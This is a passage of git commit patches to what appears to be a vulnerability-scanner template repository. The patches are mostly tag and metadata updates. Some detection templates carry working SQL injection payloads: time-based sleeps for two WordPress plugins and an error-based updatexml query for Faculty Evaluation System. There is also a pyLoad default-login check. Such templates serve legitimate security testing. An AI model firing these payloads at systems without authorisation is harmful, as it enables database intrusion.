{{Hostname}} + + - | + @timeout: 10s + GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 401' + - 'contains(content_type, "application/json")' + - 'contains(body, "There is no notification created with this id")' + condition: and + + extractors: + - type: regex + name: apikey + group: 1 + regex: + - '"home":"(.*?)",' + internal: true diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml new file mode 100644 index 0000000000..92da0a19bf --- /dev/null +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -0,0 +1,32 @@ +id: zero-spam-sql-injection + +info: + name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability. + reference: + - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5 + - https://wordpress.org/plugins/zero-spam/ + remediation: Fixed in version 2.2.0 + metadata: + verified: true + tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth + +http: + - raw: + - | + @timeout: 10s + GET / HTTP/1.1 + Host: {{Hostname}} + Client-IP: '+(select(0)from(select(sleep(7)))v)+' + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "zerospam-js")' + condition: and From d389ef4754d6108efd8014308d11cc7f32b3d299 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 15:30:05 +0530 Subject: [PATCH 456/609] Update CVE-2023-33439.yaml --- http/cves/2023/CVE-2023-33439.yaml | 21 ++++++++++++++------- 1 file changed, 14 insertions(+), 7 deletions(-) diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index eb3b71accc..af59e3f2a7 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -1,7 +1,7 @@ id: CVE-2023-33439 info: - name: SQL Injection - Faculty Evaluation System + name: Faculty Evaluation System v1.0 - SQL Injection author: Harsh severity: high description: | @@ -16,20 +16,27 @@ info: cwe-id: CWE-89 metadata: verified: true - tags: cve,cve2023,sql,unauthenticated + tags: cve,cve2023,sqli,faculty,authenticated + http: - raw: - | - GET /eval/admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 + POST /ajax.php?action=login HTTP/1.1 Host:{{Hostname}} - Content-Type: application/x-www-form-urlencoded - + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + email={{username}}&password={{password}}&login=1 + + - | + GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 + Host:{{Hostname}} + cookie-reuse: true redirects: true matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains(body, "Fatal error")' - - 'contains(body, "Uncaught Error: Call to a member function fetch_array()")' + - 'contains(body, "Fatal error:")' + - 'contains(body, "XPATH syntax error:")' condition: and From 7b99d90f2621ff88689395eaf5ebc4e4112315ba Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:32:52 +0530 Subject: [PATCH 457/609] updated tags --- cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml index 2df196adc2..cfcfd7a3bf 100644 --- a/cves/2023/CVE-2023-36346.yaml +++ b/cves/2023/CVE-2023-36346.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2023,xss,pos,codekop,unauthenticated + tags: cve,cve2023,xss,pos,codekop,unauth requests: - method: GET diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 9683b3b423..77ae78f15d 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 60ffd46e2a..a532006a00 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 897d16e2e4..0b0bce72f2 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: From 7d7e4f43acb9928875999d7c1ec0073d85059e4b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 7 Jul 2023 15:34:00 +0530 Subject: [PATCH 458/609] updated stored tags --- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/vulnerabilities/other/yeswiki-stored-xss.yaml | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 6422b35447..06f833058c 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2020,rukovoditel,stored,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 36d78662c1..c540b4ae99 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b88e86034d..f6ced50538 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 6c89c80b4d..9cdb305829 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 6a91a88389..8d281bfca8 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 0cae8c42fa..29b5ad3781 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index 4327f1b5d4..68c7640bad 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -16,7 +16,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored,huntr + tags: yeswiki,xss,stored-xss,huntr http: - raw: From 038e8d05af18cf24acbd144bf1bbb703c17c2b6c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 15:45:12 +0530 Subject: [PATCH 459/609] updated matcher and info --- http/default-logins/pyload/pyload-default-login.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml index 4144e01583..36eb044017 100644 --- a/http/default-logins/pyload/pyload-default-login.yaml +++ b/http/default-logins/pyload/pyload-default-login.yaml @@ -10,8 +10,8 @@ info: - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20. metadata: max-request: 1 - shodan-query: html:"pyload" verified: true + shodan-query: html:"pyload" tags: default-login,pyload http: @@ -19,7 +19,6 @@ http: - | POST /login HTTP/1.1 Host: {{Hostname}} - Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded do=login&username={{username}}&password={{password}}&submit=Login @@ -37,7 +36,9 @@ http: part: header words: - 'Set-Cookie: pyload_session=' + - '/dashboard' + condition: and - type: status status: - - 302 \ No newline at end of file + - 302 From 9bf24ef6866b487fc15eccb7f642bc7566c00c88 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 15:45:56 +0530 Subject: [PATCH 460/609] Update CVE-2023-36346.yaml --- cves/2023/CVE-2023-36346.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2023/CVE-2023-36346.yaml b/cves/2023/CVE-2023-36346.yaml index cfcfd7a3bf..e30965bf9a 100644 --- a/cves/2023/CVE-2023-36346.yaml +++ b/cves/2023/CVE-2023-36346.yaml @@ -1,7 +1,7 @@ id: CVE-2023-36346 info: - name: POS Codekop v2.0 - Cross-site Scripting (Reflected) + name: POS Codekop v2.0 - Cross-site Scripting author: r3Y3r53 severity: medium description: | From e631ef0f81568be854b2bb844e0758b4bb601ff5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 15:56:14 +0530 Subject: [PATCH 461/609] updated matcher --- http/exposed-panels/pyload-panel.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/pyload-panel.yaml b/http/exposed-panels/pyload-panel.yaml index 5807ed9800..e6f2896667 100644 --- a/http/exposed-panels/pyload-panel.yaml +++ b/http/exposed-panels/pyload-panel.yaml @@ -11,24 +11,26 @@ info: metadata: max-request: 1 verified: true - shodan-query: html:"pyload" + shodan-query: title:"Login - pyLoad" tags: panel,pyload,login - http: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/login" + stop-at-first-match: true host-redirects: true matchers-condition: and matchers: - type: word words: - 'Login - pyLoad' - - 'alt="Pyload"' + - 'alt="Pyload' condition: or + case-insensitive: true - type: status status: - - 200 \ No newline at end of file + - 200 From e413178372ebc5b8fcc74f754a4ef851561a5272 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:28:31 +0000 Subject: [PATCH 462/609] Auto Generated New Template Addition List [Fri Jul 7 10:28:30 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 364b378af3..e91d35de58 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ file/webshell/asp-webshell.yaml file/webshell/jsp-webshell.yaml file/webshell/php-webshell.yaml http/cnvd/2022/CNVD-2022-86535.yaml +http/cves/2012/CVE-2012-5321.yaml http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-0297.yaml http/cves/2023/CVE-2023-28121.yaml From 750fcedc70d9021f9591cfe69c459eda5801f28b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:28:40 +0000 Subject: [PATCH 463/609] Auto Generated Templates Checksum [Fri Jul 7 10:28:40 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index be411765fd..53ab1d3836 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a TOP-10.md:f96c096252794274c196f158e78053e036412447 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:fdc48e6c8c60feb9377cc704dad99e43cafcf992 -cves.json-checksum.txt:771630b0d050cef73712c3ec08e917755534c727 +cves.json:ebc6bb54326fc16c8814990d72194a90967dd802 +cves.json-checksum.txt:9c59556216b6dc733ef76e2bf39faa8babce4dee dns/azure-takeover-detection.yaml:90ea816357526ee7c170731114de8fc0a2357a27 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -640,6 +640,7 @@ http/cves/2012/CVE-2012-4878.yaml:8b835957f681819c6a98ee5d0c8dfab241f0d215 http/cves/2012/CVE-2012-4889.yaml:b94729905c1eb7527864aac08d9fe12ec43dac86 http/cves/2012/CVE-2012-4940.yaml:ad96fe92c5108ab23e46211fe893ac7df8baa78e http/cves/2012/CVE-2012-4982.yaml:edd0146a6beac65161aa4074a99ba6c4e4d325cc +http/cves/2012/CVE-2012-5321.yaml:74219ab0e0b6560d27d2cbd2b4781bb80aa6310f http/cves/2012/CVE-2012-5913.yaml:b0ddd82e2ce5a8628df761041d1b4280aeecd00b http/cves/2012/CVE-2012-6499.yaml:522ad7554dd76fbb2e125c7da7aef0e42b6e129d http/cves/2013/CVE-2013-1965.yaml:babc668e22e6d8704ce7cf798fb454f22d32c604 @@ -6522,7 +6523,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:45df3de79ada95328de686d6d029497a5c459871 +templates-checksum.txt:b5941c81b5f469a66665b435f9e23a4c5b8b2a45 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ea26ca73a6b063677d57ebacb2790cb5d7c9d7b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:29:48 +0000 Subject: [PATCH 464/609] Auto Generated New Template Addition List [Fri Jul 7 10:29:48 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e91d35de58..a0581f55f6 100644 --- a/.new-additions +++ b/.new-additions @@ -36,3 +36,4 @@ http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml http/exposures/tokens/asana/asana-client-id.yaml http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml +network/misconfig/apache-dubbo-unauth.yaml From 47be31bf53d6d9f87b26739bf23e4309d4c1fe0e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:29:53 +0000 Subject: [PATCH 465/609] Auto Generated Templates Checksum [Fri Jul 7 10:29:53 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 53ab1d3836..a659f6d1ab 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6487,6 +6487,7 @@ network/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 network/ftp-weak-credentials.yaml:5b8dbf41a9490d719bb506b2b1942ba10831c9aa network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c +network/misconfig/apache-dubbo-unauth.yaml:7a73145502da2d8eab4e01b2868e9fa4e3a24f6c network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 network/misconfig/unauth-psql.yaml:416b255a199c9a386b4abc910dd34300740d9fd3 @@ -6523,7 +6524,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:b5941c81b5f469a66665b435f9e23a4c5b8b2a45 +templates-checksum.txt:6daf7e3c9868dbbe6dfa701266cedded984d3ac1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3bd014d6befa874a6b41f4a62a33f5fbacbb8c91 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:30:15 +0000 Subject: [PATCH 466/609] TemplateMan Update [Fri Jul 7 10:30:15 UTC 2023] :robot: --- http/cves/2012/CVE-2012-5321.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 560502e29a..5b2a70c3e3 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-20 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: + max-request: 1 shodan-query: http.html:"tiki wiki" tags: cve,cve2012,redirect,tikiwiki,groupware From db7318ae96093354270f1558e92103534c40f6eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:30:56 +0000 Subject: [PATCH 467/609] Auto Generated New Template Addition List [Fri Jul 7 10:30:56 UTC 2023] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index a0581f55f6..00436a2ed8 100644 --- a/.new-additions +++ b/.new-additions @@ -16,12 +16,14 @@ http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-0297.yaml http/cves/2023/CVE-2023-28121.yaml http/cves/2023/CVE-2023-2822.yaml +http/default-logins/pyload/pyload-default-login.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arcserve-panel.yaml http/exposed-panels/cloudpanel-login.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml +http/exposed-panels/pyload-panel.yaml http/exposed-panels/shell-box.yaml http/exposed-panels/untangle-admin-login.yaml http/exposed-panels/uptime-kuma-panel.yaml @@ -37,3 +39,4 @@ http/exposures/tokens/asana/asana-client-id.yaml http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml network/misconfig/apache-dubbo-unauth.yaml +network/misconfig/apache-rocketmq-broker-unauth.yaml From 70f94037ae9024452b649d94be74c31daf2fda86 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:31:02 +0000 Subject: [PATCH 468/609] Auto Generated Templates Checksum [Fri Jul 7 10:31:02 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a659f6d1ab..ed3cd8118b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -640,7 +640,7 @@ http/cves/2012/CVE-2012-4878.yaml:8b835957f681819c6a98ee5d0c8dfab241f0d215 http/cves/2012/CVE-2012-4889.yaml:b94729905c1eb7527864aac08d9fe12ec43dac86 http/cves/2012/CVE-2012-4940.yaml:ad96fe92c5108ab23e46211fe893ac7df8baa78e http/cves/2012/CVE-2012-4982.yaml:edd0146a6beac65161aa4074a99ba6c4e4d325cc -http/cves/2012/CVE-2012-5321.yaml:74219ab0e0b6560d27d2cbd2b4781bb80aa6310f +http/cves/2012/CVE-2012-5321.yaml:03993d3f701d3b331994520dee9cda9bac556815 http/cves/2012/CVE-2012-5913.yaml:b0ddd82e2ce5a8628df761041d1b4280aeecd00b http/cves/2012/CVE-2012-6499.yaml:522ad7554dd76fbb2e125c7da7aef0e42b6e129d http/cves/2013/CVE-2013-1965.yaml:babc668e22e6d8704ce7cf798fb454f22d32c604 @@ -6488,6 +6488,7 @@ network/ftp-weak-credentials.yaml:5b8dbf41a9490d719bb506b2b1942ba10831c9aa network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c network/misconfig/apache-dubbo-unauth.yaml:7a73145502da2d8eab4e01b2868e9fa4e3a24f6c +network/misconfig/apache-rocketmq-broker-unauth.yaml:6c00290f5205f4632d0bbc2fad3bade6e56aed60 network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 network/misconfig/unauth-psql.yaml:416b255a199c9a386b4abc910dd34300740d9fd3 @@ -6524,7 +6525,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:6daf7e3c9868dbbe6dfa701266cedded984d3ac1 +templates-checksum.txt:c99e99dfe7b6c2a33056d8aa062567cb3f6fcdda wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From db7e81da7ef11bd3a6438864f434dd1aa5467fb0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:31:10 +0000 Subject: [PATCH 470/609] TemplateMan Update [Fri Jul 7 10:31:10 UTC 2023] :robot: --- network/misconfig/apache-dubbo-unauth.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml index d5a93d19ec..ad5622afd6 100644 --- a/network/misconfig/apache-dubbo-unauth.yaml +++ b/network/misconfig/apache-dubbo-unauth.yaml @@ -9,8 +9,9 @@ info: reference: - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ metadata: + fofa-query: apache dubbo + max-request: 2 verified: true - fofa-query: "apache dubbo" tags: network,dubbo,apache,unauth,misconfig tcp: From 8fc95cf110e2b1bf1f15db3a3239edfbeedb3de4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:32:26 +0000 Subject: [PATCH 471/609] TemplateMan Update [Fri Jul 7 10:32:26 UTC 2023] :robot: --- http/exposed-panels/pyload-panel.yaml | 4 ++-- network/misconfig/apache-rocketmq-broker-unauth.yaml | 3 ++- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/pyload-panel.yaml b/http/exposed-panels/pyload-panel.yaml index e6f2896667..3c40306c27 100644 --- a/http/exposed-panels/pyload-panel.yaml +++ b/http/exposed-panels/pyload-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/pyload/pyload metadata: - max-request: 1 - verified: true + max-request: 2 shodan-query: title:"Login - pyLoad" + verified: true tags: panel,pyload,login http: diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml index da8b0d2a59..01e4665e36 100644 --- a/network/misconfig/apache-rocketmq-broker-unauth.yaml +++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml @@ -9,9 +9,10 @@ info: reference: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: - verified: true fofa-query: protocol="rocketmq" + max-request: 2 shodan-query: title:"RocketMQ" + verified: true tags: network,rocketmq,broker,apache,unauth tcp: From 6469c023c4272c56aaa97e42379abd6fa337def8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:03:56 +0530 Subject: [PATCH 472/609] Update CVE-2022-44948.yaml --- http/cves/2022/CVE-2022-44948.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index df5122ae57..90fe854aef 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated http: - raw: - | From 993541f0aa4674604bb3ae6e4708bb91199596b8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:18:49 +0530 Subject: [PATCH 473/609] tag - update --- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 14e50a21e4..996f43445c 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2020,rukovoditel,xss,authenticated + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 8afb4901bd..a6bb6ff6d1 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -19,7 +19,7 @@ info: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 - tags: cve,cve2022,rukovoditel,stored,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index f316ac4f11..40009003ab 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 8712f72c85..850177753b 100644 --- 